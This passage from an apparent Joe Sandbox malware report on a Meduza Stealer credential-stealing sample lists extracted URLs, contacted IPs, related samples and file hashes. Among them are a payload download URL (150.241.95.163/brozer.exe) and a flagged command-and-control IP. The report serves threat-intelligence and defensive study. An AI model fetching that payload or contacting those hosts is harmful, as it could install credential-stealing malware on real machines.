                        http://www.fontbureau.com/designersG9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=3UuxTH6FMX.exe, 00000008.00000003.2099057290.00000218BFDFF000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designers/?9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bThe9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers?9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.tiro.com9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.goodfont.co.kr9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.sajatypeworks.com9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.typography.netD9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/cThe9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.galapagosdesign.com/staff/dennis.htm9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1978076132.0000000004FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install3UuxTH6FMX.exe, 00000008.00000003.2100300244.00000218BFDE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://150.241.95.1639RM52QaURq.exe, 00000000.00000002.2134382653.0000000002B06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contoso.com/powershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.galapagosdesign.com/DPlease9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.fonts.com9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.sandoll.co.kr9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.urwpp.deDPlease9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.zhongyicts.com.cn9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9RM52QaURq.exe, 00000000.00000002.2134382653.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1978076132.0000000004FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.sakkal.com9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://api.ipify.org/3)3UuxTH6FMX.exe, 00000008.00000002.2193147052.00000218BFD60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc943UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.apache.org/licenses/LICENSE-2.09RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.fontbureau.com9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1978076132.00000000050F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1978076132.00000000051DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1978076132.00000000050F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.1981163512.0000000006008000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=3UuxTH6FMX.exe, 00000008.00000003.2099057290.00000218BFDFF000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.ecosia.org/newtab/3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1978076132.00000000050F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://150.241.95.163/brozer.exeIError9RM52QaURq.exefalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.carterandcone.coml9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://ac.ecosia.org/autocomplete?q=3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.fontbureau.com/designers/cabarga.htmlN9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.founder.com.cn/cn9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.fontbureau.com/designers/frere-user.html9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg3UuxTH6FMX.exe, 00000008.00000003.2120404079.00000218BE281000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120597539.00000218C0058000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2120514824.00000218C0057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1978076132.00000000051DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.jiyu-kobo.co.jp/9RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.fontbureau.com/designers89RM52QaURq.exe, 00000000.00000002.2138541168.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.mozilla.org3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C05D0000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2116619540.00000218C121D000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEEA000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C06EC000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C05D8000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113394324.00000218C0698000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C06E4000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115062683.00000218BFE17000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2112207449.00000218C0690000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115513211.00000218C076B000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2113772351.00000218BFEE2000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2115960288.00000218C0763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples3UuxTH6FMX.exe, 00000008.00000003.2100300244.00000218BFDE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://ns.microsoft.t/Regi3UuxTH6FMX.exe, 00000008.00000003.2097190041.00000218C0FD1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2191984698.00000218C0FE0000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2192078543.00000218C0FE4000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2191951086.00000218C0FE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=3UuxTH6FMX.exe, 00000008.00000003.2099556343.00000218BFFF1000.00000004.00000020.00020000.00000000.sdmp, 3UuxTH6FMX.exe, 00000008.00000003.2099870231.00000218BE215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs
                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          150.241.95.163
                                                                                                                                          unknownSpain
                                                                                                                                          207714TECNALIAESfalse
                                                                                                                                          45.130.145.152
                                                                                                                                          unknownRussian Federation
                                                                                                                                          49392ASBAXETNRUtrue
                                                                                                                                          172.67.74.152
                                                                                                                                          api.ipify.orgUnited States
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1556367
                                                                                                                                          Start date and time:2024-11-15 10:27:12 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 6m 44s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:9RM52QaURq.exe
                                                                                                                                          renamed because original name is a hash value
                                                                                                                                          Original Sample Name:ca53439dbc9699e109a1810227c124dadca4066758511727be95e57b8ce3bc0f.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal93.troj.spyw.evad.winEXE@7/7@1/3
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 66.7%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 98%
                                                                                                                                          • Number of executed functions: 196
                                                                                                                                          • Number of non-executed functions: 108
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3164 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • VT rate limit hit for: 9RM52QaURq.exe
                                                                                                                                          TimeTypeDescription
                                                                                                                                          04:28:12API Interceptor17x Sleep call for process: 9RM52QaURq.exe modified
                                                                                                                                          04:28:32API Interceptor12x Sleep call for process: powershell.exe modified
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          150.241.95.163HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                          • 150.241.95.163/brozer.exe
                                                                                                                                          45.130.145.152YU7jHNMJjG.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                            6Ev0Nd7z2t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                              6HWYiong4s.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                btoRtc7o3v.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                  HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                    kBZhM3H0Qm.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                      y2m8g4DArI.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                        seRpOAk8gH.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                          1n72lp2XjT.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                            fyL0RS744g.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                              • api.ipify.org/
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              api.ipify.orgYU7jHNMJjG.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              6Ev0Nd7z2t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.12.205
                                                                                                                                                              6HWYiong4s.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              btoRtc7o3v.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.12.205
                                                                                                                                                              HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              kBZhM3H0Qm.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              y2m8g4DArI.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.13.205
                                                                                                                                                              seRpOAk8gH.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.12.205
                                                                                                                                                              1n72lp2XjT.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.13.205
                                                                                                                                                              fyL0RS744g.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.12.205
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              TECNALIAESHZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 150.241.95.163
                                                                                                                                                              eMfPZvOkbJ.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 150.241.92.160
                                                                                                                                                              G13VTHRtIa.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 150.241.92.160
                                                                                                                                                              u06cfykCat.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 150.241.92.160
                                                                                                                                                              4p8aK00tUr.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 150.241.92.160
                                                                                                                                                              aC5NsSYmN0.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 150.241.92.160
                                                                                                                                                              .main.elfGet hashmaliciousXmrigBrowse
                                                                                                                                                              • 150.241.101.236
                                                                                                                                                              invoice_template.pdf.lnkGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              • 150.241.91.218
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                                                                                                              • 150.241.90.56
                                                                                                                                                              mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                              • 150.241.95.250
                                                                                                                                                              ASBAXETNRUYU7jHNMJjG.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              6Ev0Nd7z2t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              6HWYiong4s.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              btoRtc7o3v.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              kBZhM3H0Qm.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              y2m8g4DArI.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              seRpOAk8gH.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              1n72lp2XjT.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              fyL0RS744g.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 45.130.145.152
                                                                                                                                                              CLOUDFLARENETUSNewVoicemail - +1 392 504 7XXX00-33Rebecca.silvaTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 104.16.123.96
                                                                                                                                                              YU7jHNMJjG.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              6Ev0Nd7z2t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.12.205
                                                                                                                                                              6HWYiong4s.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              btoRtc7o3v.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.12.205
                                                                                                                                                              HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              kBZhM3H0Qm.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              y2m8g4DArI.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.13.205
                                                                                                                                                              seRpOAk8gH.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.12.205
                                                                                                                                                              1n72lp2XjT.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 104.26.13.205
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19YU7jHNMJjG.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              6Ev0Nd7z2t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              6HWYiong4s.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              btoRtc7o3v.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              kBZhM3H0Qm.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              y2m8g4DArI.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              seRpOAk8gH.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              1n72lp2XjT.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              fyL0RS744g.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                              • 172.67.74.152
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeHZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                Process:C:\Users\user\Desktop\9RM52QaURq.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1330
                                                                                                                                                                Entropy (8bit):5.357600602687667
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4q4E4Tye:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HL
                                                                                                                                                                MD5:5E81AA26543B9563AD2F3DD158C2D251
                                                                                                                                                                SHA1:8CDDEF245BA7B062E14CD647C625A5E56540D4D7
                                                                                                                                                                SHA-256:74F0D7AE39AD589C466A7E10EDF16AC218774048E97A92F5C8862715EEEF0685
                                                                                                                                                                SHA-512:F802BA6E36BDE95C51B5559B6104B8E82E6F8157CF762C7F4BBA0A2E7364809157D08670D6E841A59FD32111B876C7C460B2E05ACED78720F044759D6DBF5BD4
                                                                                                                                                                Malicious:true
                                                                                                                                                                Reputation:moderate, very likely benign file
